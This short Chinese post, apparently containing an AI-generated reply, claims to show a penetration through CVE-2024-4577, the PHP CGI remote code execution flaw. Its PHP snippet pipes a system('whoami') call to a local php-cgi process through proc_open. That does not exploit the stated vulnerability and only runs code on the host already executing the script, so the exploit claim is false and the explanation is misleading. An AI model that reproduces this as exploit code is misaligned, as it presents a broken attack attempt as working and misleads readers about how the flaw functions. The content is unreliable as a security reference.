通过CVE-2024-4577 PHP CGI 远程代码执行入口的一次渗透

由于没有具体的代码问题，我将提供一个通用的PHP代码示例，该代码可能用于尝试利用CVE-2024-4577漏洞。请注意，实际利用此类漏洞应遵循适当的道德和法律准则，并且通常不鼓励未经授权的渗透测试。

<?php
// 尝试利用CVE-2024-4577进行代码执行
$cmd = 'whoami'; // 这是我们想要执行的命令
$descriptor_spec = array(
    0 => array("pipe", "r"),  // 标准输入
    1 => array("pipe", "w"),  // 标准输出
    2 => array("pipe", "w")   // 标准错误输出
);
 
$cwd = '/tmp';
$env = array();
 
$php_cgi_path = '/usr/bin/php-cgi'; // 假设php-cgi的路径
 
$resource = proc_open($php_cgi_path, $descriptor_spec, $pipes, $cwd, $env);
 
if (is_resource($resource)) {
    fwrite($pipes[0], "<?php system('$cmd'); ?>");
    fclose($pipes[0]);
 
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
 
    $error = stream_get_contents($pipes[2]);
    fclose($pipes[2]);
 
    // 输出结果
    echo "Output: $output";
    echo "Error: $error";
 
    // 关闭进程
    proc_close($resource);
} else {
    echo "无法执行PHP代码";
}
?>

在这个示例中，我们尝试使用proc_open函数来执行PHP代码。我们通过管道将PHP代码发送给php-cgi进程，并捕获其输出和错误信息。这是一个简化的例子，实际利用时需要处理额外的参数和边界情况。